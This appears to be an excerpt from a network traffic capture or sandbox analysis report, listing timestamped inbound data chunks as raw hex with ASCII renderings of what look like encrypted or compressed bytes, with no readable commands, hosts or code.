                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20120INData Raw: 77 45 bd fe 7c d3 56 9b 31 43 bb 4a 91 cf b9 03 3d 0e e4 8d 52 c8 27 ee a0 b7 29 2d 2a 22 ce 87 78 10 13 4b 81 c1 41 85 71 30 f4 95 40 0e d6 01 d8 58 57 6e 4b 69 b7 fd 44 06 92 64 69 1d 8b 76 ea 82 3c e6 c4 f1 b3 dd f0 a5 ce 62 d5 b5 9c f5 c1 48 6c 45 a4 5f 11 1f 1f 5c df 7f 81 e1 c6 e2 12 4d 4a 39 7e 87 3a f3 63 ea ff c4 ed f4 6d d4 7c e4 54 2e a6 be b9 49 ed 1f 8e 59 50 93 64 80 87 8f b8 2d 5e 89 14 b9 42 d0 f6 fc 56 ef 54 9b 05 5d 74 29 fd 8a ec 3c 8a 3e 4b 1c 62 cb 89 04 89 5f 80 fe 35 61 1f e2 37 cf 8f 6d 36 12 d5 c4 f2 ab fc 37 c0 55 5e 98 22 39 68 90 c2 82 cb 97 06 40 7d 0a 75 5e 3d b5 61 37 2d ae 82 68 17 8a 29 64 9a c9 18 4c be 4c 16 97 95 40 53 1b f4 30 a2 9c d4 5f 0f a1 72 75 34 ee 5f cc 45 fa 94 f7 38 c9 00 ad 8f 98 f3 e7 a4 6c 68 6d 90 db 0e
                                                                                                                                                                                                                                    Data Ascii: wE|V1CJ=R')-*"xKAq0@XWnKiDdiv<bHlE_\MJ9~:cm|T.IYPd-^BVT]t)<>Kb_5a7m67U^"9h@}u^=a7-h)dLL@S0_ru4_E8lhm
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20136INData Raw: d7 92 1d ba 1e 58 4c 3e 89 fc a1 db fb 5d e1 e1 e0 84 c5 c1 42 7c 9c d6 c0 64 98 64 ce ef 19 fa 63 1c e1 39 cf 00 64 f5 90 78 4b fe 33 6f 38 81 0b b2 af 65 35 9e 5a 97 76 ee b5 2e d4 12 f2 c4 10 79 08 09 f2 c3 04 48 52 95 43 98 88 47 4f 9c ad 61 65 e7 02 a3 f8 90 2e 1e e0 3a 51 eb 14 3e 36 7f c8 01 31 9f 7b 04 e8 c2 67 83 a7 aa 1d 89 18 fb 8d de 55 26 ad 00 16 5d c6 01 2e 57 0d b6 3b ff fb 77 7d 7d e5 d8 7a 43 78 bc 40 b5 2c 3d 69 55 e5 69 08 cb 30 03 17 d0 38 e5 bc cd 7b 1e 56 36 0f be bf 74 07 fd 4c 7d ed bf ab ea 0c 12 a1 f2 ef bf 1b 56 75 83 75 89 a5 b5 e0 cf 6a 4f 5b 91 c7 06 4b 57 1c 71 d3 c3 67 94 83 14 a6 fc 2d c7 cb 1a f7 dd ab c2 32 0f 15 07 40 a5 84 4d d9 3f 7d 57 76 ae b7 a4 70 01 9e 8f ec 9c e4 0f a1 26 c6 2e 8e 72 3a 78 35 34 67 db 36 52 c7
                                                                                                                                                                                                                                    Data Ascii: XL>]B|ddc9dxK3o8e5Zv.yHRCGOae.:Q>61{gU&].W;w}}zCx@,=iUi08{V6tL}VuujO[KWqg-2@M?}Wvp&.r:x54g6R
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20152INData Raw: 11 63 10 92 28 40 70 fd 04 4d ec b8 af b7 ab b3 bb c2 0d f9 30 8d 86 bb f1 bc f6 1f 71 4e d4 6d 55 18 b5 25 6b d4 b9 4c 63 7e f9 e5 a9 37 a6 d2 d1 48 77 a2 0e ac 3c 46 84 76 91 45 ec cb a6 21 91 e6 b6 2d 48 db 2d 1c 66 ea e1 77 14 71 a3 94 5d e7 a6 fa 04 72 6b 15 6e 7e ed 5e 6e c1 0a ac 03 d6 06 16 0b 54 2e c6 25 a0 fa d9 64 3a e0 08 52 1e cc cc e3 c4 bc 01 e0 c3 7b 32 81 4a 87 2d 76 89 06 9e 7a 6b d5 06 a3 46 47 79 c0 24 58 a8 e6 40 9f 1f 0f 9e 46 cf e4 d9 20 5f a0 b0 e2 87 aa 3a 70 b5 a8 f6 d5 01 14 9c 18 b9 3b 2e 96 7b 65 66 1c f3 2c 2a 34 24 ba 62 52 52 4b 2c b3 7c 8d f2 26 a9 76 01 3c a9 83 dc 3d 65 34 e8 1d 03 3a f7 05 02 9a 96 28 7c 2f 74 4b 4a d2 0a b7 28 ec cd 2a 69 fc 59 54 dd 77 52 38 78 e9 ec 8d 27 5e a7 ad 55 bd 49 16 71 77 42 7b 0c 66 1d fc
                                                                                                                                                                                                                                    Data Ascii: c(@pM0qNmU%kLc~7Hw<FvE!-H-fwq]rkn~^nT.%d:R{2J-vzkFGy$X@F _:p;.{ef,*4$bRRK,|&v<=e4:(|/tKJ(*iYTwR8x'^UIqwB{f
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20168INData Raw: f3 39 a9 82 4b de b8 b9 dd dd 93 4a f5 7d d1 83 c5 1c a6 41 da f3 af 3d d0 7b 17 5f 21 56 68 ff 47 b1 a0 fc 45 fb 3d a1 21 5a 6f 8d c5 09 0c 2a 0e c7 83 fd a3 b0 07 89 62 d7 23 60 4f 65 b8 fb 30 9e c6 d3 79 83 96 7f 90 55 58 87 e6 b7 fc ef ae 69 c2 d5 70 9d 65 81 79 b4 4b 37 b2 b7 87 d2 16 66 b2 d2 28 e2 3d 1d a4 57 7c e7 40 08 62 60 ac 56 a0 dd c7 25 db d8 54 b2 6e f8 2f e8 8a 67 f2 d6 4d 6a cb 63 ce 84 1d 96 42 9c 2f 88 56 26 6f 7a 1a f3 c5 ae 59 5b 2b 21 60 f6 49 00 4f 21 76 33 0c 9d 5b d1 98 5b 4c c6 cc 17 8f d2 05 09 c1 87 05 b5 f3 77 0d 82 d6 25 93 70 72 02 dc 42 06 e4 31 ab d1 16 68 4d fc 02 6b 11 11 aa 90 21 03 89 60 cb ad 67 e7 00 96 32 e8 2a bc c5 be 7b 54 4d 2a 67 bb 8f 4e 53 ac 33 47 a4 ce d4 3b 3b a1 23 dc ca e7 da 3f e9 67 a4 b6 47 02 a8 31
                                                                                                                                                                                                                                    Data Ascii: 9KJ}A={_!VhGE=!Zo*b#`Oe0yUXipeyK7f(=W|@b`V%Tn/gMjcB/V&ozY[+!`IO!v3[[Lw%prB1hMk!`g2*{TM*gNS3G;;#?gG1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20184INData Raw: 5a 6d 80 4f a3 8e ca 84 4b b4 5b 53 9d c7 33 f3 be 13 6f 5e e1 f0 74 21 f5 01 3a 9d a5 55 6e 99 69 b4 4f 41 45 ac ea 7e 3d 56 9f ca 9e 85 e3 d2 54 b7 da dc dd 26 01 95 d4 19 c3 54 0c 94 e2 c8 e1 be 2d 4d 41 ee 2a c7 17 0d 43 63 c9 a6 e9 5f 03 5b 01 47 51 4b a1 10 05 0a 0b 7b 0f 45 25 c9 f3 a8 e5 a2 40 9d 1f fc f8 44 f4 c5 13 a7 b2 1c 8a 1b d3 7e 33 b4 f9 ce 77 48 fe a4 8f e3 e9 a5 92 70 34 58 7f 9f a4 45 79 6d c0 1d 00 f6 11 91 24 f5 78 80 31 83 96 67 04 8c 67 ed 2e 5d 52 ea 0d 3a 91 9c 9f cf 54 ac 16 ef 0c 75 1b d5 3f cc 87 88 25 b9 55 54 7d e0 19 cd 35 57 51 3d 12 ca ed 9c 27 bd 40 0b e3 cf 65 17 4b a7 20 87 4c 12 1f 95 d5 3a 88 c8 16 24 ee 71 b7 de 3c 2b c5 ee 57 f5 37 9f 7e c6 18 9a 50 41 1b 0c 84 7a 5b c5 d1 8b 4d a7 2e a9 77 3d e4 ab f3 4c 24 43 da
                                                                                                                                                                                                                                    Data Ascii: ZmOK[S3o^t!:UniOAE~=VT&T-MA*Cc_[GQK{E%@D~3wHp4XEym$x1gg.]R:Tu?%UT}5WQ='@eK L:$q<+W7~PAz[M.w=L$C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20200INData Raw: 42 9f 5b 71 fb 20 ce a3 71 15 f1 7f 93 6b 97 03 6e 9d 05 02 fb 8c 90 b5 ab ee 74 bc e3 98 ff f3 73 34 5c 3c 02 b5 98 30 e0 41 aa 93 3e ce 8a ab c8 58 07 ee 3c b3 6d 99 11 52 e5 f8 c3 c1 6c 01 83 d1 2d c9 ae c2 e8 80 32 2a cd 40 42 a1 61 7b 70 00 3e fc 4e f0 e5 63 5d 52 72 b9 d2 d3 98 79 0d 7a 64 93 42 7c 83 fb e6 cb 49 4a 15 aa 50 c7 ac f0 53 8f 89 b1 31 1c 80 57 ba e1 40 55 1a ca c3 74 53 c4 6b 04 4c 71 8f b2 c3 06 89 88 ac 3e 43 cf da d0 c8 10 91 75 68 d1 6f 5c b5 6c 90 69 89 c5 d2 65 0d 40 0e a0 74 f6 00 0c 17 65 f5 65 c3 cb 1a 3d 97 c7 84 e8 d5 bd df e9 f1 a1 82 fe a6 a7 31 2c 17 04 91 17 c9 b4 85 33 54 cf 97 c7 72 21 41 4e 98 b8 b7 87 3f cf 47 52 d4 bb 3b 74 33 44 0a 0b 5c d6 f3 47 e2 27 04 f6 48 de cc 7b bc c3 58 46 b1 ed bb f8 4d 1d de ff 7a a8 1b
                                                                                                                                                                                                                                    Data Ascii: B[q qknts4\<0A>X<mRl-2*@Ba{p>Nc]RryzdB|IJPS1W@UtSkLq>Cuho\lie@tee=1,3Tr!AN?GR;t3D\G'H{XFMz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20216INData Raw: 39 86 39 1e 66 89 3a 9c 02 66 0b b9 dc 24 f0 80 fe d0 c0 4d ae 6a 19 45 07 ef b2 0f 30 f3 66 2d a0 f5 43 ce 57 c6 30 9d d5 4e 8e bb ac e3 fc df 9c b6 bb a9 48 70 d4 75 bf d6 c7 5d a5 1c 01 2b bc 88 ff 72 37 b2 98 65 50 ca b5 a2 c6 61 07 7b 1b 83 f1 c4 5e 06 9c 21 36 6c e2 b3 9e b2 24 df 95 e6 e4 c6 46 77 3c b4 88 64 b3 1e 5d 8b 4f 1f d4 b6 2d 37 50 19 00 9e 68 b4 85 f2 fc 65 33 ef 57 41 4c 11 ca 56 72 f0 55 ed c1 4e b1 cd 1e 9e e2 2a 98 aa 4b cd a8 75 12 ed 3c 83 3b e4 77 c3 0b 74 45 9c 6a e9 0d 34 bb d6 9c d5 b1 05 b5 5d 6c 64 51 97 00 0c 37 44 f8 f6 d4 cf 4a e5 ce fc 99 7a 21 1a 64 2c 59 cb ee b1 f1 7c 59 df 0a 53 46 4a 62 c7 d0 53 7a f9 f4 69 53 bb 7d 87 52 b4 38 50 99 e3 61 98 9e 87 0e 4b b3 8f 2c 97 a9 96 de 5b fa 51 81 a2 5f 46 63 44 a4 e3 0b 81 5f
                                                                                                                                                                                                                                    Data Ascii: 99f:f$MjE0f-CW0NHpu]+r7ePa{^!6l$Fw<d]O-7Phe3WALVrUN*Ku<;wtEj4]ldQ7DJz!d,Y|YSFJbSziS}R8PaK,[Q_FcD_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20232INData Raw: ac 00 54 30 3b 83 85 c5 dc de 92 5c 72 a2 1c 85 38 4b 87 8b 36 29 78 c7 9b d9 a4 ad 1f e0 0b dd bd 21 3b 3a 62 b5 30 f3 3a f8 03 87 b5 b6 3c 6d 6b 50 59 0e 34 bd 5a 22 74 d5 5c 3b 2d ea f4 38 e7 8e 90 62 d8 15 d3 01 e9 05 30 6c 97 db 41 5f 72 a7 4d bd 76 3d e1 14 17 99 8a 47 34 9f f7 31 9f 1e 83 7a 16 80 48 67 07 7f df 09 88 7a d5 14 5f 55 1e d4 71 00 4d ff 1e 15 31 73 0d 73 04 3f 43 a7 fc f8 de 50 82 b9 79 ee c2 e2 22 69 93 bf f4 9b ec 48 0d ab f4 99 67 54 d5 45 ee 7c 7a 0d cb 5c 63 8b 1b ea 43 09 0a f8 61 b1 b0 88 0a 5a 85 4a 5e 4d 3e 38 3c 48 0c e6 62 57 b0 3f 76 bf 0d 4e 2b a6 ec 96 05 28 52 b7 a1 6a 4d fc 9d 97 23 4d 26 54 a5 3e 13 29 f9 d9 62 76 bf 91 5c 1a c6 0b e7 2b 6d 8c c4 68 22 b3 8a 44 70 01 91 98 7b 27 3b d3 75 0e 14 11 a1 9c fe f4 e2 ba ba
                                                                                                                                                                                                                                    Data Ascii: T0;\r8K6)x!;:b0:<mkPY4Z"t\;-8b0lA_rMv=G41zHgz_UqM1ss?CPy"iHgTE|z\cCaZJ^M>8<HbW?vN+(RjM#M&T>)bv\+mh"Dp{';u
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20248INData Raw: 1a 06 1e 01 dc c5 45 cd 7a c6 e8 33 ff 74 3a 6e e4 f7 8c 52 2d 5f d7 b2 0c 77 54 c9 41 7b 5a 35 a5 ea 79 c4 d3 80 2a 62 fb ab 42 54 10 0b a4 3d ee 88 1f 24 c1 2e c5 05 ff d6 25 b3 81 5e fe 5e a3 cb 7c 30 83 da af 82 89 84 40 a7 9b a8 6b 70 d3 9c 35 1d 17 9b 93 8b 7a 38 ba b0 3e fd d9 20 97 73 bb 70 23 46 51 f2 bf 74 e0 b3 35 48 2c 34 14 3d 01 50 7f 5a f5 11 e7 9d d5 16 7a 93 dc af 8f e8 b1 58 73 1b c1 eb 85 b9 86 52 65 f4 93 42 56 2e 42 0a 1b cd 35 f7 0a 18 5a 4c 98 6c d4 64 e5 8b a1 e2 3b 55 0a 05 89 1c 02 18 ed c8 60 4e 6f dd 09 aa ad 45 f9 e6 f3 8e 9f b5 5c 45 cc 4a 12 fe 9d 70 54 36 6c 40 98 e6 26 2e a2 f4 02 f4 a2 6a c2 b9 30 37 33 65 0a c6 5b e2 c9 60 43 95 50 42 a1 8f 0c e4 a6 17 3d 29 e2 0a 70 07 e2 11 42 3d 49 6b 3a 90 70 21 33 1c f4 f6 bb 58 0a
                                                                                                                                                                                                                                    Data Ascii: Ez3t:nR-_wTA{Z5y*bBT=$.%^^|0@kp5z8> sp#FQt5H,4=PZzXsReBV.B5ZLld;U`NoE\EJpT6l@&.j073e[`CPB=)pB=Ik:p!3X
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20264INData Raw: 43 a2 e7 c3 1b 88 cf 23 ae 9f 1b 04 7c 38 5b d4 8e 09 d0 cd ea c7 71 aa 72 23 03 73 b8 d2 09 f3 27 37 f1 65 39 08 be 99 2f fe 20 c7 a4 9c 58 5b b7 fa 2b 9e 6d 32 fe ce 71 83 b1 c0 d4 76 36 35 39 58 a4 6a 5f a2 8a 78 3c a7 ba 97 d8 b4 59 6b be 90 f7 8d 1a eb d6 75 06 45 57 43 dc db 5d 3a e9 86 91 1f 79 b5 94 4f 4f 11 bb b7 fc bc 1c 7f 63 7a 90 2c f3 44 e3 51 94 35 c2 a1 8e 97 02 02 3f 35 8b 73 f4 0a 6c 4c df a5 44 77 c4 96 cc 6b a9 f8 1a 83 2f dc 0c 0e b5 3b 12 1a c2 5d c1 f1 fa 29 89 42 ae 04 4d 16 6e 40 d1 08 75 82 a2 28 04 9f 15 34 4e ad 0b e6 b9 64 b4 a9 12 69 57 09 27 a1 9e 17 61 7b 8d 9d 81 55 fe ec b4 bb e0 d6 d6 5b c6 7b 7d 6f d8 1a 1e 39 24 86 3f 0e a1 7c 23 00 fb 04 64 d9 d9 fb 86 09 2e 0c 8e 39 96 7e 61 17 30 0c c9 6d bd e6 dd 3f c2 b2 5b 43 c2
                                                                                                                                                                                                                                    Data Ascii: C#|8[qr#s'7e9/ X[+m2qv659Xj_x<YkuEWC]:yOOcz,DQ5?5slLDwk/;])BMn@u(4NdiW'a{U[{}o9$?|#d.9~a0m?[C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20280INData Raw: e8 76 47 77 2d ec 09 ed ce 78 33 4e 94 3d d1 79 cb 6b 61 78 8b af c2 f0 fe 59 7e 06 a5 e8 2a 2c 67 82 b5 67 92 81 13 cb 65 38 45 90 55 f9 f3 12 80 af 36 0c 24 74 e6 65 47 c1 01 cb d2 6e d3 ff de 4b 3c 63 c8 4b 23 c9 78 fd 8e d7 8a 2c 10 03 bf b5 1c 03 ef 4b 98 9b a5 99 14 79 18 21 e5 29 23 84 3c 0c ff fe 57 27 7d 0f 23 c8 87 f8 b9 c5 c8 bf ed 8b c7 d1 98 5d d4 09 00 92 2c ab 73 10 82 4b 9e 1e 40 d1 d2 e2 aa b8 9a 57 7c c9 4a d6 d5 44 45 1c d3 49 d2 a2 51 96 f1 63 22 08 36 de 23 11 e2 b6 fa 50 27 f7 ca 72 6a 4c e5 f2 f5 a3 ed 0c c1 dd dd 52 d2 91 75 72 24 45 59 5f 61 fc a8 31 50 c2 44 a8 40 d5 d2 fc 76 08 0b dd 21 59 79 82 14 cb a3 17 84 72 92 a6 33 23 30 79 2a 44 57 05 ee 85 71 ae f6 f4 83 6c 7e 5f 52 c2 e8 e8 1e 21 f1 53 4c a7 d2 f3 4b 35 9f e5 82 9a 70
                                                                                                                                                                                                                                    Data Ascii: vGw-x3N=ykaxY~*,gge8EU6$teGnK<cK#x,Ky!)#<W'}#],sK@W|JDEIQc"6#P'rjLRur$EY_a1PD@v!Yyr3#0y*DWql~_R!SLK5p
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20296INData Raw: 2b 9f 91 56 18 e4 ed 70 3d d4 60 b8 45 df 11 14 72 54 1c ba 0c 3a 10 a3 3a 25 db b7 b2 8b 00 88 4a 4f 37 8c 50 ab 0d f0 3f 27 46 ce 7a c9 1f 5d 28 f7 15 41 d1 14 a8 e0 af c8 5b c3 af a5 df e6 f5 1e e6 72 3e 6c ad bb 2f 46 1a a0 b9 ff 0a 59 ad 0c 95 c0 d5 4a 7e fe e1 f8 b2 cd 3f ed be 71 15 61 86 cc 70 22 23 05 a9 bb 9a f3 b3 9a 94 c4 a3 59 61 16 66 20 77 ac 0e e8 de 22 99 f4 63 fa e4 6c 81 d5 e8 7f 44 45 54 1a 16 2b 87 83 38 6a 2a 75 67 1a 96 64 0b 77 22 3c 98 3f 88 72 f9 bd 26 3d ca ce 06 31 4c c1 98 d2 1c e8 85 6d 3c 2e 1b 51 3f e2 a3 46 f3 60 4c 37 c0 76 02 8a 6a 5f 02 f3 bd 72 d7 d7 b4 d3 20 d6 fa 70 ef 4c 5e 2d 14 fa 5a 4d 13 29 56 a7 e6 54 a0 cd 92 37 40 fc 08 e0 bf 67 ec 48 ce 54 bb d1 b8 b0 43 01 87 81 f4 1d 03 4c df 0c d6 b2 54 a6 45 76 f4 a8 f5
                                                                                                                                                                                                                                    Data Ascii: +Vp=`ErT::%JO7P?'Fz](A[r>l/FYJ~?qap"#Yaf w"clDET+8j*ugdw"<?r&=1Lm<.Q?F`L7vj_r pL^-ZM)VT7@gHTCLTEv
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20312INData Raw: 1d f3 c5 b7 d9 cc 1e c8 db c4 cb c1 75 be 8b f8 78 f2 f4 ef 6c bd 64 d0 36 6e d0 03 fc d7 35 82 01 19 d1 e3 ab 44 ac bb 59 6b 4a 3c 8e 01 23 eb 35 f0 c7 d9 95 d6 ff a4 91 ae 3e 09 ab af 25 7c c1 4c 51 c1 65 76 f8 18 93 63 b9 df 69 65 8f b7 a8 8e 48 d5 13 c6 24 b4 33 17 d9 56 fd 7c a8 14 f0 8e 90 69 db 92 62 0c 41 d8 99 7e 14 e1 57 e6 7c 2c b9 e0 e7 1e 0e c1 12 a2 f8 23 13 c9 36 5b 34 80 15 6a c6 b4 ba 66 43 b4 03 4d 11 2c d4 14 0e 6a 69 30 bf 8a 10 70 bd fb 44 fd 15 5b 0e 61 84 6f d3 58 c7 83 e4 17 bb 85 54 b5 37 c9 45 27 a2 d8 57 97 23 21 74 5e f9 2d 07 42 45 72 2c cb f2 cf 94 d0 90 3a c3 71 8f a4 db a2 6a 4b 31 8b 04 a0 f4 30 bb 83 06 ea 02 f4 fb f8 55 c2 45 1e 5b fa 2d 71 8c d2 cd 4d 88 b9 d5 ef b1 94 1a 6c 2f 40 ae 09 5f e2 da 7b 7d 61 30 50 50 cb 40
                                                                                                                                                                                                                                    Data Ascii: uxld6n5DYkJ<#5>%|LQevcieH$3V|ibA~W|,#6[4jfCM,ji0pD[aoXT7E'W#!t^-BEr,:qjK10UE[-qMl/@_{}a0PP@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20328INData Raw: 98 3e fe 11 fc 18 1d 31 b5 2f d7 46 cb 14 fd 80 98 f1 40 40 6e d4 17 cd b2 65 e2 66 cb 3d a7 21 3b 61 be 11 81 71 69 74 dc 9a 00 e6 c2 61 2f 2f 00 5d 05 25 93 9c 46 01 49 cd f6 6f 06 b2 bd 23 ba c7 ba ad 9b ee 22 be f7 5d f1 08 4c 22 07 6c 01 fc b1 85 9a 11 42 7a b7 0f d0 0b 03 78 58 27 23 97 6d bc 89 f4 9c 38 69 d5 3d 99 2d 86 5c b9 d3 6a f8 33 f3 44 85 38 e1 56 67 74 66 a4 75 d3 a9 38 36 20 ba 49 e3 1a 75 4e a6 7f da 30 66 83 89 87 ce 02 fa 41 5e fb eb 97 41 34 48 a6 be bf 6f 8e 02 1e 99 57 4b f5 a4 33 2a 58 e5 1a 63 e3 de d0 0d b7 b5 14 71 66 63 88 84 9d 8f 96 3b 9b f0 e1 24 1d de 21 48 32 8a d6 7c 5e 29 23 01 9d 07 a5 21 96 0b 0d 4f 86 78 60 91 c6 76 3a cc c1 58 22 8a 4e e6 d8 ec 5d 51 c2 1e b3 39 b1 87 5d df ea 01 b6 87 7e a4 bd 1b 70 16 13 8e 95 af
                                                                                                                                                                                                                                    Data Ascii: >1/F@@nef=!;aqita//]%FIo#"]L"lBzxX'#m8i=-\j3D8Vgtfu86 IuN0fA^A4HoWK3*Xcqfc;$!H2|^)#!Ox`v:X"N]Q9]~p
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20344INData Raw: 94 09 ad e4 e3 ea 4c a6 fc 03 52 8d a9 3c 24 8e 52 85 94 16 56 e9 c7 cd 90 32 61 58 60 16 dd 99 85 49 eb 91 fb f2 16 2d 61 6e 66 e0 1c c8 17 95 62 bd 77 31 e4 e8 39 b9 c4 65 f7 65 1d 6f 02 1b ab 71 c9 22 5e 7b e9 e2 ae 6f 06 f7 93 96 a2 52 93 59 ab 96 07 37 ea d1 cb 0c 0c c1 c5 45 83 c9 c4 33 2d ea 28 b7 45 39 b4 ba 9f 1a 26 0a 1a 24 c4 c5 52 3d c3 45 3f 52 e2 1d 1b 47 ae 56 f4 bf 8d a1 67 d3 e4 b8 19 8d ff c2 a0 b3 00 14 e9 cf 79 60 ae 05 a4 b3 3d 2e ad 55 83 81 5f 87 65 d1 cc e6 f6 e5 e3 cb d0 95 4f ef ee 56 90 ad fc 48 ad 08 2e d5 d9 57 47 c7 a2 57 1c ca 73 5c eb 46 ba 3e 91 e9 8b 8c ac 53 de 54 d2 b0 34 79 0b dd d7 f9 48 4e 49 eb b7 4d dd 6d 36 50 c5 ca 26 03 c7 22 2a 36 dd bc f0 ad 34 fd 27 d1 21 fd e0 e9 94 d5 67 ad 17 76 75 02 61 0f 25 49 69 84 9e
                                                                                                                                                                                                                                    Data Ascii: LR<$RV2aX`I-anfbw19eeoq"^{oRY7E3-(E9&$R=E?RGVgy`=.U_eOVH.WGWs\F>ST4yHNIMm6P&"*64'!gvua%Ii
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20360INData Raw: c8 fd a1 02 7e 5b 15 ed e9 f2 a3 ed 28 56 46 18 09 69 5f a9 62 37 4a 08 f8 52 60 e9 80 b3 5a a3 0b 7b 28 fe 88 21 36 a6 0f 4a 8d 65 0d fe 21 90 bd 58 c7 d1 64 5c e6 c0 0c 4e 5b c5 74 4c ef 7d c5 c4 8b ed fa a2 fb a1 6e a2 66 d5 b9 1b fb f9 d0 aa 01 45 4f 36 fd 81 1d 3a bf 95 1f a8 6d 7c 3c dd fa 2d e9 df 9d ea 38 90 da 62 c4 03 89 15 f2 e9 24 c1 04 33 21 8c 2e 34 a5 ac 95 ee cc 02 50 aa 71 e4 2d e5 8e 6b 04 f7 61 87 06 40 7e 3c d4 be 5c d1 8f ef dd 40 fa ad d7 6b 3c d2 f1 e6 20 bf 17 62 87 bc d3 03 b8 69 02 ea 64 0c 1f 89 2d aa 42 f7 14 63 40 57 8c d4 34 66 35 ea 1e 6e bb 7c 96 5e e0 9c c4 ee c7 e1 94 cc c3 ae 28 54 dd 95 e2 6a 0d 96 bf 31 48 a1 8f c4 be e7 ff 15 b0 36 38 80 56 b1 ff f6 ad e2 75 95 0f 49 72 51 94 98 2b 11 c1 5a 6a 63 cb a1 af 8e 1a 68 45
                                                                                                                                                                                                                                    Data Ascii: ~[(VFi_b7JR`Z{(!6Je!Xd\N[tL}nfEO6:m|<-8b$3!.4Pq-ka@~<\@k< bid-Bc@W4f5n|^(Tj1H68VuIrQ+ZjchE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20376INData Raw: 95 4b 4b 2a 37 31 18 e2 76 1b 1a f8 ea 04 70 d3 f5 35 c5 9a 22 21 dd 79 60 e6 3d 9c b4 1c 43 25 fe 4b 29 92 41 a3 4b c9 70 b4 f4 6b d3 ff f0 1c 1f e8 90 8a b0 f4 77 dd 92 03 53 2c 8b c5 4a a7 1e a0 ac be 9f 12 b2 30 54 88 4b 31 2e 74 10 db 8d 23 c5 c8 80 07 57 ba 65 34 62 df 60 90 1a 16 51 20 9a 9d b6 e1 06 d4 fc 49 47 12 b4 4c 4a ce 69 7f 4b 4f c2 ce 8e f1 99 1f e0 c0 dc dc 50 8c 8d 9d 81 9a 1b b6 18 83 3d cb b9 15 d1 2a da be cd 9b 2a 5c 35 5d 07 67 52 68 a7 a4 4b 10 fe 62 e0 97 da e2 81 d9 9d 64 48 05 9a ec e2 5f 4a 3c ae 00 d6 52 d5 28 41 56 8c 18 93 58 61 0d a9 2c 1a 13 60 95 e7 0d 9d 17 21 9d 74 7b 14 c8 7e c6 ac 19 ab d0 de 1d 89 5b e7 ee 94 db 66 98 0c ec 85 7e 4b 6e 63 d2 47 41 6f 03 65 fe 9c 4d 77 0b c9 d4 e2 9a 8e 20 bd 4c ed 81 ab 35 13 ac 9a
                                                                                                                                                                                                                                    Data Ascii: KK*71vp5"!y`=C%K)AKpkwS,J0TK1.t#We4b`Q IGLJiKOP=**\5]gRhKbdH_J<R(AVXa,`!t{~[f~KncGAoeMw L5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20392INData Raw: 24 47 66 11 9f 73 17 94 ac 93 4a fc 04 3c 9c 93 01 0a 2b 7b f7 52 93 fe fc 9b 25 21 b2 ab c0 63 c1 ef 90 b1 da 19 f5 72 d4 36 86 a3 69 88 a1 ef 9c 4b 65 fa 61 1a d5 97 7b 3a 30 90 64 33 47 fd 11 a4 fb 51 17 fa 6b 23 ef a8 73 5c b6 77 fa 28 fa 6c 9f 30 5b b1 99 c3 be d7 62 66 05 cb 27 27 15 e4 2d 63 75 e7 24 cb 2d f5 c6 87 4b e6 c1 b6 a7 9b 40 ae ac b1 3d 45 6e 3a a2 c5 c9 9b ba 71 06 08 77 8d 5d ad d0 e3 c2 6c bd 2a 23 18 bf 29 22 f6 e5 49 52 05 35 fc ed 77 8b a7 9d 49 3e 81 d2 e7 b3 e0 1e 0f df 13 b8 b2 4b cc 2a 6b 1a 60 72 73 35 f7 c1 5a d1 5c db 5f 72 13 cc e7 e6 63 39 33 8a 39 d8 cd 0b e1 b3 26 b4 5f 72 9e bc 7d 0e 84 f1 b9 7c 95 09 ea 60 a7 c3 e2 4f 6d 9f 3d 9e c2 99 9f db 92 17 bd 34 ef 42 2c 48 1a ee 9a 98 82 6c cf ec 90 d8 09 d7 3c 7f a2 38 59 41
                                                                                                                                                                                                                                    Data Ascii: $GfsJ<+{R%!cr6iKea{:0d3GQk#s\w(l0[bf''-cu$-K@=En:qw]l*#)"IR5wI>K*k`rs5Z\_rc939&_r}|`Om=4B,Hl<8YA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20408INData Raw: 91 d7 16 2d be 18 37 e9 8e c8 1b c2 84 8f 11 3f a5 e1 57 0f a1 9b 29 15 2b 8d 5c 34 96 39 34 e9 52 28 c4 b9 40 4c 38 02 15 ce f1 68 de 11 b1 cd 17 e4 58 c9 01 55 2e f2 b1 90 12 15 ea d3 eb 1e 7c 59 39 aa 55 39 78 5b d7 be e3 e5 6d 75 32 06 06 00 75 4a 65 a0 d4 89 cf 56 79 84 27 aa d2 10 a4 0d 57 32 ea c7 58 92 30 8e 75 b8 3d 9d c7 63 68 45 ed e1 dd f8 12 0d 56 9b 39 f9 99 be 6a e2 45 ea 35 2f b2 bf 56 9c 89 e2 98 e7 6b 53 b6 30 d6 91 6b 63 fd ec 75 88 2f 11 f1 4b ae 63 32 ce 74 19 da 26 62 e2 68 d1 31 be 78 c9 7a a7 27 2a 23 57 cb 6f fc 5b 98 c3 f1 79 02 4d c4 8c cd 0d c7 85 e4 10 99 f6 15 36 26 d7 38 19 45 d0 b0 74 51 88 8d 4e 5f b8 52 60 e7 6e 63 5b b6 5a d2 b3 d6 5d 9e fe 6e 8b 04 ca 34 df 9f f7 18 c2 5b 93 13 46 ab c1 ec f8 58 c0 54 f4 66 ed 24 6f 69
                                                                                                                                                                                                                                    Data Ascii: -7?W)+\494R(@L8hXU.|Y9U9x[mu2uJeVy'W2X0u=chEV9jE5/VkS0kcu/Kc2t&bh1xz'*#Wo[yM6&8EtQN_R`nc[Z]n4[FXTf$oi
